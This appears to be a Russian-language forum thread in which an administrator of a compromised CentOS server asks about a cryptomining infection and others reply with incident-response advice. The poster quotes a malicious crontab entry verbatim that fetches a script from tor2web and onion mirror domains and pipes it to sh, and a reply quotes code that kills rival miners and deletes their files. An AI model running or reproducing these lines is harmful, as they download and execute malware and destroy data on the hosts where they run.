Я работаю на взломанном сервере. CentOS 6.10 с [kthreadd] занимает большую часть процессора.
Старый crontab удален, а следующий контент помещен на место:
*/4 * * * * R=$(shuf -i 1-29 -n 1);sleep ${R:-0};BP=$(dirname "$(command -v yes)");BP=${BP:-"/usr/bin"};G1="curl";if [ $(curl --version 2>/dev/null|grep "curl "|wc -l) -eq 0 ];then G1="echo";for f in ${BP}/*;do strings $f 2>/dev/null|grep -q "CURLOPT_VERBOSE" && G1="$f" && break;done;fi;G2="wget";if [ $(wget --version 2>/dev/null|grep "wgetrc "|wc -l) -eq 0 ];then G2="echo";for f in ${BP}/*;do strings $f 2>/dev/null|grep -q "to <bug-wget@gnu.org>" && G2="$f" && break;done;fi;if [ $(cat /etc/hosts|grep -i "onion.\|timesync.su\|tor2web"|wc -l) -ne 0 ];then echo "127.0.0.1 localhost" > /etc/hosts >/dev/null 2>&1;fi; C=" -fsSLk --connect-timeout 26 --max-time 75 ";W=" --quiet --tries=1 --no-check-certificate --connect-timeout=26 --timeout=75 ";H="https://an7kmd2wp4xo7hpr";T1=".tor2web.su/";T2=".d2web.org/";T3=".onion.sh/";P="src/ldm";($G1 $C $H$T1$P||$G1 $C $H$T2$P||$G1 $C $H$T3$P||$G2 $W $H$T1$P||$G2 $W $H$T2$P||$G2 $W $H$T3$P)|sh &
Я также нашел в файловой структуре следующий сценарий оболочки: пастебин
Итак, на основании всего того, что я обнаружил в системе, я выяснил, что все скажут мне создать новый сервер. И я, безусловно, буду. Но, может быть, найдется кто-то, кто захочет внимательно изучить сценарий. Мне очень хотелось бы знать, как вообще была взломана система
Сам скрипт не помогал в определении вектора атаки. Вы можете получить общее представление, указав расположение сценария и пользователя, от имени которого он был запущен. Если это был root, тоже не поможет.
Так что да, здесь важно то, что отныне ваш сервер будет оставаться скомпрометированным, что бы вы ни делали.
Я полагаю, вы уже удалили вредоносное задание cron? Скорее всего, существует какой-то бэкдор или оставшийся процесс, который возродится и / или воссоздает cron.
Если вы хотите, чтобы сервер работал, вы можете настроить утилиту аудита с правилами модификации файлов, чтобы увидеть, какие процессы что меняют. И поднимитесь по цепочке, чтобы найти законный скомпрометированный процесс.
Каким образом вас скомпрометировали - это, в первую очередь, правильный вопрос, чтобы выяснить первопричину. Но это не то, на что можно ответить, посмотрев сценарий. Сценарий - это полезная нагрузка. Он был установлен каким-то образом, например, учетными данными в руках злоумышленника или цепочкой эксплойтов.
Кроме того, простое знание того, как этот хост был взломан, не устраняет никаких других уязвимостей в вашей среде.
Рассмотрите возможность привлечения консультанта по безопасности для проведения тестирования на проникновение или упражнений красной группы. Посторонний человек может лучше увидеть уязвимости.
Очевидно домен an7kmd2wp4xo7hpr.tor2web.su имеет плохую репутацию как вредоносный сайт.
То, что происходит, на первый взгляд кажется относительно простым: майнинг криптовалют.
elif [ -f /proc/${p}/comm ]; then
xmf="$(readlink /proc/${p}/cwd 2>/dev/null)/$(cat /proc/${p}/comm 2>/dev/null)"
xm=$(grep -i "xmr\|cryptonight\|hashrate" ${xmf} 2>/dev/null)
fi
if [ -n "${xm}" ]; then ${sudo} kill -9 ${p} >/dev/null 2>&1; ${sudo} chattr -i -a "${xmf}" >/dev/null 2>&1; ${sudo} ${rm} -rf "${xmf}" >/dev/null 2>&1; fi
Убить конкурирующих майнеров и выжить после перезагрузки - больше прибыли для злоумышленников. Не первый так поступил, это была модель, наблюдаемая на ящиках Linux в течение нескольких месяцев если не дольше.